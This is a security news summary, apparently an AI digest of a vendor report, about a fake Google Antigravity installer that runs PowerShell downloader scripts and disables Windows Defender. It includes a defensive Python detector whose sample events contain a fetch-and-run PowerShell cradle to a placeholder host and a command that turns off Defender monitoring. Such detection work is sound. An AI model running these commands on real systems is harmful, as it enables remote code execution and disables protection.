Fake Google Antigravity Trojan Stealing Accounts Quickly

A new trojanized installer for Google Antigravity is stealing user accounts. Unsuspecting victims are at risk of data theft. Stay vigilant and ensure downloads are from official sources.

Malware & Ransomware · HIGH

Original Reporting

Malwarebytes Labs

AI Summary

CyberPings AI · Reviewed by Rohit Rana

🎯 Basically, a fake Google app is stealing your login info when you install it.

What Happened

A new malware campaign has emerged, targeting users searching for Google’s Antigravity coding tool. Unsuspecting victims are downloading a trojanized installer from a lookalike domain, believing they are getting the legitimate software. The malicious installer operates seamlessly, making it difficult for users to detect any wrongdoing.

How It Works

The fake installer, named Antigravity_v1.22.2.0.exe, is crafted to resemble the real Google application. However, it contains an additional step that executes a PowerShell script during installation. This script quietly connects to an external server, allowing attackers to control what happens next.

The malicious script drops two PowerShell files into the user's temporary folder. One of these files is designed to open a connection to the attacker's server and request further instructions. This method, known as a downloader cradle, allows attackers to change their payload without needing to modify the installer.

Signs of Infection

Victims may not notice anything unusual immediately. The application appears to function normally, and the only signs of infection occur in the background. The malware can disable Windows Defender's scanning capabilities, making it harder to detect.
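
The background behaviors described above (an installer launching PowerShell, a script run from the temporary folder, a downloader cradle, Defender scanning being turned off) can be hunted for in process-creation logs. The following is an added example, not code from the original report or from Malwarebytes Labs; the event field names, the sample events, the download patterns and the `Set-MpPreference`/`Add-MpPreference` check are assumptions, since the summary does not quote the scripts or say how Defender is disabled.

```python
import re

PS_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
RULES = {
    # PowerShell launched by an executable living under a user profile (e.g. Downloads)
    "user_dir_parent": ("parent", re.compile(r"^[a-z]:\\users\\.+\.exe$", re.I)),
    # A .ps1 executed from a temporary folder
    "temp_script": ("cmdline", re.compile(
        r"\\(?:appdata\\local\\temp|windows\\temp)\\[^\s\"']+\.ps1\b", re.I)),
    # Common download-and-run primitives (assumed patterns, not quoted from the report)
    "download_cradle": ("cmdline", re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|invoke-restmethod", re.I)),
    # Defender settings changed from PowerShell (assumed mechanism)
    "defender_tamper": ("cmdline", re.compile(
        r"(?:set|add)-mppreference\b.*-(?:disable|exclusion)\w+", re.I)),
}

def signals(event):
    """Return the names of all rules matched by one process-creation event."""
    if not event["image"].lower().endswith(PS_IMAGES):
        return []
    return [name for name, (field, rx) in RULES.items() if rx.search(event[field])]

def is_suspicious(event):
    """Alert on Defender tampering alone, or on any two signals together."""
    hits = signals(event)
    return "defender_tamper" in hits or len(hits) >= 2

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
INSTALLER = r"C:\Users\a\Downloads\Antigravity_v1.22.2.0.exe"
# Constructed sample events (Sysmon Event ID 1 style), not taken from the report.
SAMPLE_EVENTS = [
    {"parent": INSTALLER, "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\a\AppData\Local\Temp\stage1.ps1"},
    {"parent": INSTALLER, "image": PS,
     "cmdline": "powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/next')"},
    {"parent": PS, "image": PS,
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe Get-ChildItem C:\Projects"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": PS,
     "cmdline": "powershell.exe Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious(ev), signals(ev))
```

Requiring two signals keeps a lone `Invoke-WebRequest` from a developer tool (the last sample event) from alerting, while the installer-spawned cases and the Defender change are still flagged.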

How to Protect Yourself

To avoid falling victim to this type of malware, always ensure you download software from official websites. Check URLs carefully to avoid typosquatting domains. Additionally, consider using antivirus software that can detect and block malicious scripts. If you suspect you have installed this trojan, immediately run a full system scan and change your passwords for sensitive accounts.

🔒 Pro Insight

This campaign highlights the effectiveness of typosquatting and downloader techniques in modern malware distribution.
